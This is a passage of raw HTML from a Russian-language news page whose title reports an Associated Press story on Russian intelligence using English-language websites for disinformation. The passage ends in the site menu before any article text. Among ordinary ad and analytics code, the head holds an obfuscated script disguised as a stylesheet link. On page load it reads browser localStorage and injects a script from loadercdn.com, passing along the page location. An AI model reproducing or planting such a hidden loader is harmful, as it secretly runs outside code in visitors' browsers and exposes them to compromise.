<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации, &#8212; Associated Press | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации, &#8212; Associated Press "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2020/07/303458.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="253" /><meta property="og:image:alt" content="Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации, &#8212; Associated Press " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="По словам представителей правительства США, российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации" /><meta property="og:description" content="По словам представителей правительства США, российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации" /><meta name="keywords" content="веб-ресурсы,дезинформация,демократ,ресурс,новости мира" /><link rel="canonical" href="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press" /><meta property="og:url" content="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press" /><style>.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4813427';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4813427&amp;a=5696" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/59256651/enovosty_970x250', [[970, 250], [970, 90]], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_970x90', [970, 90], 'div-gpt-ad-1595961667034-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());googletag.defineSlot('/59256651/Adaptive_zone', [1, 1], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.enableServices();});
</script><script type="text/plain" id="vpb-catfish-template"><div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:3;"><div class="vpb-ad" style="display: block;position: relative;margin:0px auto;"><span class="vpb-close-button"
style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;"><img src="data:image/png;base64,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"/></span></div></div></script><script>function catfish(div) {var gt = window.googletag || {};gt.cmd = gt.cmd || [];gt.cmd.push(function () {var template = document.getElementById('vpb-catfish-template').innerHTML;var adContainer = document.getElementById(div);adContainer.innerHTML = template;adContainer.id = 'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];var newAdDiv = document.createElement('div');newAdDiv.id = div;innerWrapper.appendChild(newAdDiv);googletag.pubads().addEventListener('slotRenderEnded', function (event) {var slot = event.slot;var slotId = slot.getSlotElementId();if (slotId != div)  return;if (event.isEmpty) {closeBtn.style.display = 'none';adContainer.style.display = 'none';return;}adContainer.style.display = 'block';innerWrapper.style.width = event.size[0] + 'px';innerWrapper.style.height = event.size[1] + 'px';closeBtn.style.display = 'inline-block';closeBtn.addEventListener('click', function () {adContainer.parentElement.removeChild(adContainer);})
});gt.display(div);})
}</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/news_society-ukr/full/2907-rosijski-specsluzhbi-vikoristovuyut-anglomovni-veb-sajti-dlya-poshirennya-dezinformacii-associated-press">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>27.86</td><td>27.45</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>32.80</td><td>31.82</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.40</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>500.21</td><td>0.00</td><td>20:36 29.07.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1324.16</td><td>0.76</td><td>17:00 29.07.2020</td> </tr> <tr> <td>RTS</td><td>1266.01</td><td>0.66</td><td>18:51 29.07.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>43.59</td><td>+0.86</td><td style="text-transform:uppercase;">Jul</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>41.20</td><td>+0.39</td><td style="text-transform:uppercase;">Jul</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>377.75</td><td>+1.21</td><td style="text-transform:uppercase;">Jul</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a 